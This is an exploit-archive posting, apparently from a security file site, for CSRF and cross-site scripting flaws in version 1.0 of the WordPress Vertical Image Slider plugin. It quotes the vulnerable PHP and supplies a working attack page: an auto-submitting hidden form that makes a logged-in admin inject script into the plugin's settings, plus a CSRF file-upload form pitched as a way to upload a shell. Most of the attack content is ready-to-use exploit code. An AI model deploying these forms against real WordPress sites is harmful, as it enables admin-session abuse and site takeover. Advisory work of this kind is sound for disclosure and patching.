WordPress Vertical Image Slider 1.0 CSRF / XSS

WordPress Vertical Image Slider 1.0 CSRF / XSS: Posted Sep 19, 2015; Authored by Ehsan Hosseini; WordPress Vertical Image Slider plugin version 1.0 suffers from cross site request forgery and cross site scripting vulnerabilities.; tags | exploit, vulnerability, xss, csrf; SHA-256 | 63f064a0c336409406e1795abef613e59a229b155d2c3f25704ac46915950f95; Download | Favorite | View

WordPress Vertical Image Slider 1.0 CSRF / XSS

######################
# Exploit Title : Wordpress Vertical image slider CSRF/XSS
# Exploit Author: Ashiyane Digital Security Team
# Vendor Homepage: https://wordpress.org/plugins/wp-vertical-image-slider/
# Software Link:  
https://downloads.wordpress.org/plugin/wp-vertical-image-slider.zip
# Date: 2015-08-2
# Version: 1.0
# Tested On : Elementary OS - Firefox
######################
# Vulnerabilities :
- Cross Site Request Forgery (For change the values and upload shell)
- Cross Site Scripting
######################
# Vulnerable Code:
<?php
$title=trim(addslashes($_POST['imagetitle']));
$imageurl=trim($_POST['imageurl']);
?>
...
<input type="text" id="imageurl" class="url"  tabindex="1" size="30"  
name="imageurl" value="<?php echo $image_link; ?>">
<input type="text" id="imagetitle"  tabindex="1" size="30"  
name="imagetitle" value="<?php echo $title;?>">
# it shows the content of imagetitle and imageurl parameter without  
any filters.
######################
# Exploit (CSRF, XSS):
-->

<form method="post" name="form1"  
action="http://[URL]/[PATH]/wp-admin/admin.php?page=vertical_thumbnail_slider_image_management&action=addedit"  
enctype="multipart/form-data">
<input type="hidden" name="imagetitle"  
value='"><script>alert("XSS")</script>'>
<input type="hidden" name="imageurl" value='"><script>alert("XSS")</script>'>
<input type="file" name="image_name" />
<input type="submit" name="btnsave" value="Save Changes">
</form>
<script type="text/javascript">
setTimeout('form1.submit()', 1);
</script>

<!--
######################
# Just for upload something by CSRF:
-->
<form method="post"  
action="http://[URL]/[PATH]/wp-admin/admin.php?page=vertical_thumbnail_slider_image_management&action=addedit"  
enctype="multipart/form-data">
<input type="file" name="image_name" />
<input type="submit" name="btnsave" value="Save Changes">
</form>


<!--
######################
# Discovered By : Ehsan Hosseini
######################
-->

Top Authors In Last 30 Days

Red Hat 263 files
indoushka 178 files
Ubuntu 96 files
Gentoo 32 files
Debian 20 files
Apple 11 files
LiquidWorm 10 files
malvuln 8 files
Rubén López Herrera 5 files
Google Security Research 5 files

File Archives

Systems

AIX (430)
Apple (2,117)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,137)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,599)
HPUX (881)
iOS (391)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,486)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (16,995)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,903)
UNIX (9,466)
UnixWare (188)
Windows (6,783)
Other

WordPress Vertical Image Slider 1.0 CSRF / XSS

WordPress Vertical Image Slider 1.0 CSRF / XSS

File Archive:

October 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

WordPress Vertical Image Slider 1.0 CSRF / XSS

Share This

WordPress Vertical Image Slider 1.0 CSRF / XSS

File Archive:

October 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems